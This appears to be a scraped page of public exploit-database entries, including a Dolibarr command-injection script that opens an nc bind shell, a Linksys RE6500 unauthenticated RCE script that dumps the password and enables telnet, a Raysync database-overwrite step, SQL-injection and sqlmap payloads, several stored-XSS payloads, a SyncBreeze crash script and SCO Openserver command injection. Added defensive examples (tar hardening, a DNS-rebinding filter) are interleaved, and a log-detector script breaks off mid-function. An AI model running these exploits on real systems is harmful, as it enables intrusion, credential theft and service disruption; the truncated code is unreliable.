
Everything posted by HireHackking
-
Raysync 3.3.3.8 - RCE
# Exploit Title: Raysync 3.3.3.8 - RCE
# Date: 04/10/2020
# Exploit Author: XiaoLong Zhu
# Vendor Homepage: www.raysync.io
# Version: below 3.3.3.8
# Tested on: Linux

step1: run RaysyncServer.sh to build a web application in the local environment and set the admin password to 123456, which will be written to the manage.db file.
step2: curl "file=@manage.db" http://[raysync ip]/avatar?account=1&UserId=/../../../../config/manager.db to overwrite the remote manage.db file on the server.
step3: log in to the admin portal with admin/123456.
step4: create a normal file with all permissions in scope.
step5: modify RaySyncServer.sh, adding an arbitrary evil command.
step6: trigger the RCE by clicking the "reset" button.
-
Seotoaster 3.2.0 - Stored XSS on Edit page properties
# Exploit Title: Seotoaster 3.2.0 - Stored XSS on Edit page properties
# Exploit Author: Hardik Solanki
# Vendor Homepage: https://www.seotoaster.com/
# Software Link: https://crm-marketing-automation-platforms.seotoaster.com/
# Version: 3.2.0
# Tested on Windows 10

XSS ATTACK:
Cross-site Scripting (XSS) is a client-side code injection attack. The attacker aims to execute malicious scripts in the web browser of the victim by including malicious code in a legitimate web page or web application. The actual attack occurs when the victim visits the web page or web application that executes the malicious code. The web page or web application becomes a vehicle to deliver the malicious script to the user's browser. Vulnerable vehicles that are commonly used for Cross-site Scripting attacks are forums, message boards, and web pages that allow comments.

XSS IMPACT:
1: Steal the cookie
2: User redirection to a malicious website

Vulnerable Parameters: Edit page properties

Steps to reproduce:
1: Navigate to "https://localhost/" and log in with valid credentials.
2: Then navigate to/click on "Edit page properties".
3: Add the payload "*"><script>alert(document.cookie)</script>*" in the "Page header H1 tag" field and click on the "Save Page" button. Page saved successfully.
4: Hence the XSS will get stored and trigger on the main home page.
-
Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated)
# Exploit Title: Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated)
# Date: 2020.12.17
# Exploit Author: Yilmaz Degirmenci
# Vendor Homepage: https://github.com/Dolibarr/dolibarr
# Software Link: https://sourceforge.net/projects/dolibarr/
# Version: 12.0.3
# Tested on: Kali Linux 2020.2
# Vulnerability Description: Open source ERP-CRM Dolibarr 12.0.3 is
# vulnerable to authenticated Remote Code Execution Attack. An attacker who
# has access to the admin dashboard can manipulate the backup function by
# inserting payload into the zipfilename_template parameter at page
# /admin/tools/dolibarr_export.php by clicking on the button "Generate
# Backup" thus triggering command injection on target system.

import requests
from bs4 import BeautifulSoup
import urllib.parse

username = input("username: ")
password = input("password: ")
root_url = input("Root URL: http://192.168.0.15/ --> ")
print("Exploit is sent! Check out if the bind shell on port 9999 active!")
listener_port = "9999"

login_url = root_url + "/index.php?mainmenu=home"
vulnerable_url = root_url + "/admin/tools/dolibarr_export.php"
upload_url = root_url + "/admin/tools/export_files.php"

session = requests.Session()
request = session.get(login_url)

# Get the token value from the login form
soup = BeautifulSoup(request.text, "lxml")
token = soup.find("input", {'name': 'token'})['value']

# Login
body = {"token": token, "actionlogin": "login", "loginfunction": "loginfunction", "tz": "-5",
        "tz_string": "America%2FNew_York", "dst_observed": "1", "dst_first": "2020-03-8T01%3A59%3A00Z",
        "dst_second": "2020-11-1T01%3A59%3A00Z", "screenwidth": "1668", "screenheight": "664",
        "dol_hide_topmenu": "", "dol_hide_leftmenu": "", "dol_optimize_smallscreen": "",
        "dol_no_mouse_hover": "", "dol_use_jmobile": "", "username": username, "password": password}
session.post(login_url, data=body, cookies=request.cookies)

# Load the export page and read the token from that page (the login page's
# soup was parsed before authentication, so it has to be re-parsed here)
request = session.get(vulnerable_url)
soup = BeautifulSoup(request.text, "lxml")
token = soup.find("input", {'name': 'token'})['value']

header = {
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0",
    "Accept": "*/*",
    "Accept-Encoding": "gzip, deflate",
    "Origin": root_url,
    "Referer": root_url + "/admin/tools/dolibarr_export.php?mainmenu=home&leftmenu=admintools",
    "Upgrade-Insecure-Requests": "1"
}
body = {"token": token, "export_type": "server", "page_y": "1039",
        "zipfilename_template": "documents_dolibarr_12.0.3_202012160422.tar --use-compress-program='nc -c bash -nlvp 9999' %0a :: ",
        "compression": "gz"}
param = urllib.parse.urlencode(body, quote_via=urllib.parse.quote)
session.post(upload_url, data=body, params=param, cookies=request.cookies, headers=header)
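An added example, not Dolibarr's own code: how a backup routine can accept a user-supplied archive name such as zipfilename_template without the command injection shown above. The name is validated against a strict pattern and tar is given an argument vector with no shell, so the injected option and newline in the exploit's value can never become separate words; the file names and directory layout are constructed for the example.

```python
import os
import re
import subprocess
import tempfile

# Constructed inputs: the archive name the backup page proposes, and the
# zipfilename_template value used in the exploit above (here only as a
# rejected test input).
GOOD_NAME = "documents_dolibarr_12.0.3_202012160422.tar"
BAD_NAME = ("documents_dolibarr_12.0.3_202012160422.tar "
            "--use-compress-program='nc -c bash -nlvp 9999' \n :: ")

# Letters, digits, dot, underscore and dash only; must end in .tar and may not
# begin with a dash or a dot (no option look-alikes, no hidden or parent paths).
NAME_RE = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,127}\.tar")


def is_valid_archive_name(name):
    """True only for names matching the whole-string pattern above."""
    return bool(NAME_RE.fullmatch(name))


def build_tar_argv(name, src_dir, compression="gz"):
    """Argument vector for the backup: no shell, long options, '--' ends options.

    Because the name travels as one argv element, whitespace, quotes and
    newlines inside it cannot create extra arguments; the validation on top
    keeps the name within what the application means by a backup file.
    """
    if not is_valid_archive_name(name):
        raise ValueError(f"rejected archive name: {name!r}")
    if compression not in ("gz", "none"):
        raise ValueError(f"unknown compression: {compression!r}")
    argv = ["tar", "--create"]
    archive = name
    if compression == "gz":
        argv.append("--gzip")
        archive += ".gz"
    # --file=NAME binds the name to the option; "--" protects src_dir the same way.
    argv += [f"--file={archive}", "--", src_dir]
    return argv


def run_backup(name, src_dir, dest_dir, compression="gz"):
    """Create the archive inside dest_dir and return its path."""
    argv = build_tar_argv(name, src_dir, compression)
    subprocess.run(argv, cwd=dest_dir, check=True)  # list form: no shell involved
    return os.path.join(dest_dir, argv[-3][len("--file="):])


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as work:
        src = os.path.join(work, "documents")
        os.mkdir(src)
        with open(os.path.join(src, "note.txt"), "w") as fh:
            fh.write("constructed sample document\n")
        print("created", run_backup(GOOD_NAME, src, work))
        try:
            build_tar_argv(BAD_NAME, src)
        except ValueError as err:
            print("blocked:", err)
```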
-
Content Management System 1.0 - 'id' SQL Injection
# Exploit Title: Content Management System 1.0 - 'id' SQL Injection
# Exploit Author: Zhayi (Zeo)
# Date: 2020-12-14
# Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
# Tested on: WINDOWS 10

Step 1. Capture the request of the "http://127.0.0.1/ajax.php?action=load_list" page in Burp Suite
Step 2. Save the POST packet
Step 3. Run sqlmap on the request file using the command "python3 sqlmap.py -r request.txt --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast --dbs"
Step 4. This will inject successfully and you will have an information disclosure of all database contents

POST packet
---
POST /ajax.php?action=load_list HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 63
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=ltiafgjrnml0d8kqe58gcsk1v3
Origin: http://127.0.0.1
Referer: http://127.0.0.1/index.php?page=list&c=sub_navigation_1&cid=eccbc87e4b5ce2fe28308fd9f2a7baf3
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

id=eccbc87e4b5ce2fe28308fd9f2a7baf3%27and%27u%27%3D%27u&start=0
---

SQLMAP
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND 9689=9689 AND 'ZPQO'='ZPQO&start=0

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND (SELECT 6418 FROM (SELECT(SLEEP(5)))ROIx) AND 'XaBw'='XaBw&start=0

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171716a71,0x5559707346467277634166536c6e786168576872504f746f7a5a4c52624d4c495742566651725242,0x7170627171),NULL,NULL,NULL,NULL,NULL-- -&start=0
---
-
Content Management System 1.0 - 'email' SQL Injection
# Exploit Title: Content Management System 1.0 - 'email' SQL Injection
# Exploit Author: Zhayi (Zeo)
# Date: 2020-12-14
# Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
# Tested on: WINDOWS 10

Step 1. Capture the request of the "http://127.0.0.1/ajax.php?action=login" page in Burp Suite
Step 2. Save the POST packet
Step 3. Run sqlmap on the request file using the command "python3 sqlmap.py -r request.txt --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast --dbs"
Step 4. This will inject successfully and you will have an information disclosure of all database contents

POST packet
---
POST /ajax.php?action=login HTTP/1.1
Host: 10.211.55.4
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 61
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=ltiafgjrnml0d8kqe58gcsk1v3
Origin: http://10.211.55.4
Referer: http://10.211.55.4/login.php
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

email=admin%40admin.com%27and%27p%27%3D%27p&password=admin123
---

SQLMAP
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: email=admin@admin.com'and'p'='p' AND 9108=9108 AND 'WlxU'='WlxU&password=admin123

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=admin@admin.com'and'p'='p' AND (SELECT 3864 FROM (SELECT(SLEEP(5)))pNJR) AND 'hxyZ'='hxyZ&password=admin123
---
-
Content Management System 1.0 - 'First Name' Stored XSS
# Exploit Title: Content Management System 1.0 - 'First Name' Stored XSS
# Exploit Author: Zhayi (Zeo)
# Date: 2020-12-14
# Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Tested on: WINDOWS 10

Step 1: Log in to the CMS with any valid user credentials.
Step 2: Click on the logged-in username in the header and select Manage Account.
Step 3: Rename the user First Name to "<script>alert(document.domain)</script>".
Step 4: Update Profile and this will trigger the XSS.
Step 5: Log out and log in again and the page will display the domain name.
-
Linksys RE6500 1.0.11.001 - Unauthenticated RCE
# Exploit Title: Linksys RE6500 1.0.11.001 - Unauthenticated RCE
# Date: 31/07/2020
# Exploit Author: RE-Solver
# Public disclosure: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html#4
# Vendor Homepage: www.linksys.com
# Version: FW V1.05 up to FW v1.0.11.001
# Tested on: FW V1.05 up to FW v1.0.11.001
# Linksys RE6500 V1.0.05.003 and newer - Unauthenticated RCE
# Unsanitized user input in the web interface for Linksys WiFi extender RE6500 allows Unauthenticated remote command execution.
# An attacker can access system OS configurations and commands that are not intended for use beyond the web UI.

#!/usr/bin/env python
import requests

print("Linksys RE6500, RE6500 - Unsanitized user input allows Unauthenticated remote command execution.")
print("Tested on FW V1.05 up to FW v1.0.11.001")
print("RE-Solver @solver_re")

ip = "192.168.1.226"

command = "nvram_get Password >/tmp/lastpwd"  # save device password
post_data = "admuser=admin&admpass=;" + command + ";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
url_codeinjection = "http://" + ip + "/goform/setSysAdm"
s = requests.Session()
s.headers.update({'Origin': "http://" + ip})
s.headers.update({'Referer': "http://" + ip + "/login.shtml"})
r = s.post(url_codeinjection, data=post_data)
if r.status_code == 200:
    print("[+] Prev password saved in /tmp/lastpwd")

command = "busybox telnetd"  # start telnetd
post_data = "admuser=admin&admpass=;" + command + ";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
url_codeinjection = "http://" + ip + "/goform/setSysAdm"
s = requests.Session()
s.headers.update({'Origin': "http://" + ip})
s.headers.update({'Referer': "http://" + ip + "/login.shtml"})
r = s.post(url_codeinjection, data=post_data)
if r.status_code == 200:
    print("[+] Telnet Enabled")

# set admin password
post_data = "admuser=admin&admpass=0000074200016071000071120003627500015159&confirmadmpass=admin&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
url_codeinjection = "http://" + ip + "/goform/setSysAdm"
s = requests.Session()
s.headers.update({'Origin': "http://" + ip})
s.headers.update({'Referer': "http://" + ip + "/login.shtml"})
r = s.post(url_codeinjection, data=post_data)
if r.status_code == 200:
    print("[+] Prevent corrupting nvram - set a new password= admin")
-
Smart Hospital 3.1 - "Add Patient" Stored XSS
# Exploit Title: Smart Hospital 3.1 - "Add Patient" Stored XSS
# Exploit Author: Kislay Kumar
# Date: 2020-12-18
# Vendor Homepage: https://smart-hospital.in/index.html
# Software Link: https://codecanyon.net/item/smart-hospital-hospital-management-system/23205038
# Affected Version: Version 3.1
# Tested on: Kali Linux

Step 1. Log in to the application with Super Admin credentials.
Step 2. Click on "OPD-Out Patient", then click on "Add Patient", then select "Add Patient" again.
Step 3. Insert the payload "><svg/onmouseover=alert(1)> in Name, Guardian Name, Email, Address, Remarks and Any Known Allergies and save it.
Step 4. Now the patient profile will open; when your cursor moves around the profile details they will show an alert box.
-
Queue Management System 4.0.0 - "Add User" Stored XSS
# Exploit Title: Queue Management System 4.0.0 - "Add User" Stored XSS
# Exploit Author: Kislay Kumar
# Date: 2020-12-21
# Google Dork: N/A
# Vendor Homepage: http://codekernel.net/
# Software Link: https://codecanyon.net/item/queue-management-system/22029961
# Affected Version: Version 4.0.0
# Patched Version: Unpatched
# Category: Web Application
# Tested on: Kali Linux

Step 1. Log in as admin.
Step 2. Select "Users" from the menu and click on "Add User".
Step 3. Insert the payload "><svg/onload=alert(1)> in "First Name", "Last Name" and "Email".
Step 4. Now open "User List" from the menu and you will get an alert box.
-
FRITZ!Box 7.20 - DNS Rebinding Protection Bypass
# Exploit Title: FRITZ!Box 7.20 - DNS Rebinding Protection Bypass
# Date: 2020-06-23
# Exploit Author: RedTeam Pentesting GmbH
# Vendor Homepage: https://en.avm.de/
# Version: 7.20
# CVE: 2020-26887

Advisory: FRITZ!Box DNS Rebinding Protection Bypass

RedTeam Pentesting discovered a vulnerability in FRITZ!Box router devices
which allows DNS answers that point to IP addresses in the private local
network to be resolved, despite the DNS rebinding protection mechanism.

Details
=======

Product: FRITZ!Box 7490 and potentially others
Affected Versions: 7.20 and below
Fixed Versions: >= 7.21
Vulnerability Type: Bypass
Security Risk: low
Vendor URL: https://en.avm.de/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-003
Advisory Status: published
CVE: 2020-26887
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-26887

Introduction
============

"For security reasons, the FRITZ!Box suppresses DNS responses that refer to
IP addresses in its own home network. This is a security function of the
FRITZ!Box to protect against what are known as DNS rebinding attacks."
(from the vendor's homepage)

More Details
============

FRITZ!Box router devices employ a protection mechanism against DNS rebinding
attacks. If a DNS answer points to an IP address in the private network range
of the router, the answer is suppressed.

Suppose the FRITZ!Box router's DHCP server is in its default configuration
and serves the private IP range 192.168.178.1/24. If a DNS request is made by
a connected device which resolves to an IPv4 address in the configured private
IP range (for example 192.168.178.20), an empty answer is returned. However,
if instead the DNS answer contains an AAAA record with the same private IP
address in its IPv6 representation (::ffff:192.168.178.20), it is returned
successfully. Furthermore, DNS requests which resolve to the loopback address
127.0.0.1 or the special address 0.0.0.0 can be retrieved, too.

Proof of Concept
================

Supposing the following resource records (RR) are configured for different
subdomains of example.com:

------------------------------------------------------------------------
private.example.com      1 IN A    192.168.178.20
local.example.com        1 IN A    127.0.0.1
privateipv6.example.com. 1 IN AAAA ::ffff:192.168.178.20
------------------------------------------------------------------------

A DNS request to the FRITZ!Box router for the subdomain private.example.com
returns an empty answer, as expected:

------------------------------------------------------------------------
$ dig private.example.com @192.168.178.1

; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> private.example.com @192.168.178.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 58984
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;private.example.com.           IN      A
------------------------------------------------------------------------

DNS requests for the subdomains privateipv6.example.com and local.example.com
return the configured resource records successfully, effectively bypassing
the DNS rebinding protection:

------------------------------------------------------------------------
$ dig privateipv6.example.com @192.168.178.1 AAAA

; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> @192.168.178.1 privateipv6.example.com AAAA
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6510
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;privateipv6.example.com.       IN      AAAA

;; ANSWER SECTION:
privateipv6.example.com. 1      IN      AAAA    ::ffff:192.168.178.20

$ dig local.example.com @192.168.178.1

; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> local.example.com @192.168.178.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28549
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;local.example.com.             IN      A

;; ANSWER SECTION:
local.example.com.      1       IN      A       127.0.0.1
------------------------------------------------------------------------

Workaround
==========

None.

Fix
===

The problem is corrected in FRITZ!OS 7.21.

Security Risk
=============

As shown, the DNS rebinding protection of FRITZ!Box routers can be bypassed,
allowing for DNS rebinding attacks against connected devices. This type of
attack, however, is only possible if vulnerable services are present in the
local network which are reachable over HTTP without authentication. The web
interface of FRITZ!Box routers, for example, is not vulnerable to this type of
attack, since the HTTP Host header is checked for known domains. For this
reason the risk is estimated to be low.

Timeline
========

2020-06-23 Vulnerability identified
2020-07-08 Vendor notified
2020-07-20 Vendor provided fixed version to RedTeam Pentesting
2020-07-23 Vendor notified of another problematic IP
2020-08-06 Vendor provided fixed version to RedTeam Pentesting
2020-10-06 Vendor starts distribution of fixed version for selected devices
2020-10-19 Advisory released

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a team of
specialised IT-security experts. Hereby, security weaknesses in company
networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share
its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public security
advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team in
Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

--
RedTeam Pentesting GmbH                 Tel.: +49 241 510081-0
Dennewartstr. 25-27                     Fax : +49 241 510081-99
52068 Aachen                            https://www.redteam-pentesting.de
Germany                                 Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
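As an added illustration of the filter behaviour the advisory describes (example code written for this page, not AVM's implementation and not RedTeam Pentesting's), the following Python normalises IPv4-mapped AAAA answers before the private-range comparison and also drops loopback and unspecified addresses, covering the three gaps reported above. The 192.168.178.0/24 network is assumed from the advisory's default configuration, and the sample records are the advisory's three plus constructed public ones.

```python
import ipaddress

# Constructed configuration: the private range the FRITZ!Box DHCP server
# serves in its default configuration, as stated in the advisory.
LOCAL_NETS = [ipaddress.ip_network("192.168.178.0/24")]

# The advisory's resource records, a 0.0.0.0 answer, and two constructed
# public records that a correct filter must leave untouched.
SAMPLE_RECORDS = [
    ("private.example.com", "A", "192.168.178.20"),
    ("local.example.com", "A", "127.0.0.1"),
    ("privateipv6.example.com", "AAAA", "::ffff:192.168.178.20"),
    ("zero.example.com", "A", "0.0.0.0"),
    ("public.example.com", "A", "93.184.216.34"),
    ("publicv6.example.com", "AAAA", "2001:db8::1"),
]


def normalize(value):
    """Parse an A/AAAA value and collapse IPv4-mapped IPv6 (::ffff:a.b.c.d) to IPv4.

    This is the step the bypassed filter lacked: comparing the raw IPv6 form
    against an IPv4 range never matches, so the answer slipped through.
    """
    addr = ipaddress.ip_address(value)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        return addr.ipv4_mapped
    return addr


def should_suppress(value, local_nets=LOCAL_NETS):
    """True when a DNS answer must be dropped by rebinding protection."""
    addr = normalize(value)
    # Loopback (127.0.0.1, ::1) and unspecified (0.0.0.0, ::) both end up on
    # the client's own host; 127.0.0.1 and 0.0.0.0 were the advisory's
    # second finding.
    if addr.is_loopback or addr.is_unspecified:
        return True
    # Anything inside the router's own network, whether it arrived as an A
    # record or as an IPv4-mapped AAAA record. Version mismatches are False.
    return any(addr in net for net in local_nets)


def filter_answers(records, local_nets=LOCAL_NETS):
    """Split (name, type, value) records into (allowed, suppressed) lists."""
    allowed, suppressed = [], []
    for name, rr_type, value in records:
        if rr_type not in ("A", "AAAA"):
            allowed.append((name, rr_type, value))  # only address records carry an IP
            continue
        try:
            drop = should_suppress(value, local_nets)
        except ValueError:
            drop = True  # malformed address data: fail closed
        (suppressed if drop else allowed).append((name, rr_type, value))
    return allowed, suppressed


if __name__ == "__main__":
    ok, dropped = filter_answers(SAMPLE_RECORDS)
    for rec in dropped:
        print("suppressed:", rec)
    for rec in ok:
        print("allowed:   ", rec)
```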
-
Xeroneit Library Management System 3.1 - "Add Book Category " Stored XSS
# Exploit Title: Xeroneit Library Management System 3.1 - "Add Book Category" Stored XSS
# Exploit Author: Kislay Kumar
# Date: 2020-12-18
# Vendor Homepage: https://xeroneit.net/
# Software Link: https://xeroneit.net/portfolio/library-management-system-lms
# Affected Version: Version 3.1
# Tested on: Kali Linux

Step 1. Log in to the application as Admin.
Step 2. Select "Book" from the menu and click on "Book Category". Now click on the "Add" button.
Step 3. Insert the payload "><img src onerror=alert(1)> in "Category Name" and save it.
Step 4. Now you will see an alert box.
-
SyncBreeze 10.0.28 - 'login' Denial of Service (Poc)
# Exploit Title: SyncBreeze 10.0.28 - 'login' Denial of Service (Poc)
# Date: 18-Dec-2020
# Exploit Author: Ahmed Elkhressy
# Vendor Homepage: http://www.syncbreeze.com
# Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe
# Version: 10.0.28
# Tested on: Windows 7, Windows 10

#!/usr/bin/python
import socket

host = "192.168.1.9"
payload = 'A' * 1000

request = ""
request += "POST /login HTTP/1.1\r\n"
request += "Host: " + host + "\r\n"
request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
request += "Accept-Language: en-US,en;q=0.5\r\n"
request += "Accept-Encoding: gzip, deflate\r\n"
request += "Content-Type: application/x-www-form-urlencoded\r\n"
request += "Content-Length: 27\r\n"
request += "Origin: http://" + host + "\r\n"
request += "Connection: keep-alive\r\n"
request += "Referer: http://" + host + "/login" + payload + "\r\n"
request += "Upgrade-Insecure-Requests: 1\r\n"
request += "\r\n"
request += "username=test&password=test"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 80))
s.send(request.encode())  # sockets take bytes, not str
print(s.recv(1024))
s.close()
-
Academy-LMS 4.3 - Stored XSS
# Exploit Title: Academy-LMS 4.3 - Stored XSS
# Date: 19/12/2020
# Vendor page: https://academy-lms.com/
# Version: 4.3
# Tested on Win10 and Google Chrome
# Exploit Author: Vinicius Alves
# XSS Payload: </script><svg onload=alert();>

1) Access the LMS and log in to the admin panel
2) Access the courses page
3) Open the course manager and the SEO menu
4) Paste the XSS payload tag and submit
5) Access the course page on the frontend
6) Triggered!
-
Spotweb 1.4.9 - 'search' SQL Injection
# Exploit Title: Spotweb 1.4.9 - 'search' SQL Injection
# Google Dork: N/A
# Date: 20 December 2020
# Exploit Author: BouSalman
# Vendor Homepage: https://github.com/spotweb/spotweb
# Software Link: N/A
# Version: 1.4.9
# Tested on: Ubuntu 18.04
# CVE: CVE-2020-35545

GET /?page=index&search[tree]=cat0_z0_c')+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))c)+AND+(' HTTP/1.1
Host: 192.168.99.151
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
-
SCO Openserver 5.0.7 - 'outputform' Command Injection
# Exploit Title: SCO Openserver 5.0.7 - 'outputform' Command Injection
# Google Dork: inurl:/cgi-bin/manlist?section
# Discovered Date: 04/09/2020
# Author: Ramikan
# Vendor Homepage: https://www.xinuos.com/products/
# Software Link: https://www.sco.com/products/openserver507/-overview
# Affected Version: Tested on 5.0.7, 6 can be affected on other versions.
# Tested on: SCO Openserver 5.0.7 & version 6
# CVE : CVE-2020-25494

*************************************************************************************************************************************
Vulnerability: OS Command Injection
*************************************************************************************************************************************

The outputform and toclevels parameters appear to be vulnerable to OS command injection attacks. It is possible to use various shell metacharacters to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses; however, it is possible to inject time delay commands to verify the existence of the vulnerability. It is also possible to cause the application to interact with an external domain, to verify that a command was executed.

The payload |nslookup -q=cname mytest.com.& was submitted in the parameters. The application performed a DNS lookup for the specified domain name.

Additionally, the payload |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1 was submitted in the parameters. The application took 20960 milliseconds to respond to the request, compared with 1348 milliseconds for the original request.

Affected URL: http://host:8457/cgi-bin/printbook
Affected Parameter: outputform, toclevels

*************************************************************************************************************************************
POC
*************************************************************************************************************************************
Request:
*************************************************************************************************************************************
POST /cgi-bin/printbook HTTP/1.1
Host: 10.0.0.45:8457
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.45:8457/en/Navpages/printmap.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

outputform=ps%7cping%20-n%2021%20127.0.0.1%7c%7c%60ping%20-c%2021%20127.0.0.1%60%20%23'%20%7cping%20-n%2021%20127.0.0.1%7c%7c%60ping%20-c%2021%20127.0.0.1%60%20%23%5c%22%20%7cping%20-n%2021%20127.0.0.1&booktitle=test&toclevels=3&part=%2Fen%2FOSR_FEATS%2FCONTENTS.html&part=%2Fen%2FUSE_oview%2FCONTENTS.
*************************************************************************************************************************************
Response:
*************************************************************************************************************************************
HTTP/1.1 200 OK
Date: Tue, 04 Sep 2020 11:17:52 GMT
Server: Apache/1.3.33 (Unix) mod_perl/1.29
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 3188
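An added detection example, not part of the advisory: it reads constructed request records shaped like the PoC above, URL-decodes the outputform and toclevels parameters, flags shell metacharacters that only become visible after decoding (%7c, %60), and marks a flagged request as slow relative to the median of clean requests, mirroring the 20960 ms versus 1348 ms observation. The log layout is a constructed simplification, and the watched parameter names are taken from the advisory.

```python
import re
import urllib.parse

# Constructed log lines: "METHOD PATH DURATION_MS BODY". The third line carries
# the URL-encoded outputform payload quoted in the advisory.
SAMPLE_LOG = """\
POST /cgi-bin/printbook 1348 outputform=ps&booktitle=test&toclevels=3
POST /cgi-bin/printbook 1402 outputform=pdf&booktitle=intro&toclevels=2
POST /cgi-bin/printbook 20960 outputform=ps%7cping%20-n%2021%20127.0.0.1%7c%7c%60ping%20-c%2021%20127.0.0.1%60%20%23'&booktitle=test&toclevels=3
POST /cgi-bin/printbook 1290 outputform=ps&booktitle=a%26b&toclevels=1
"""

# Shell metacharacters that have no place in a format or depth parameter.
# Matching happens on the decoded value: the payload arrives as %7c / %60,
# never as a literal | or `.
META_RE = re.compile(r"[|;`$]|\$\(|&&|\|\|")
WATCHED_PARAMS = ("outputform", "toclevels")


def parse_line(line):
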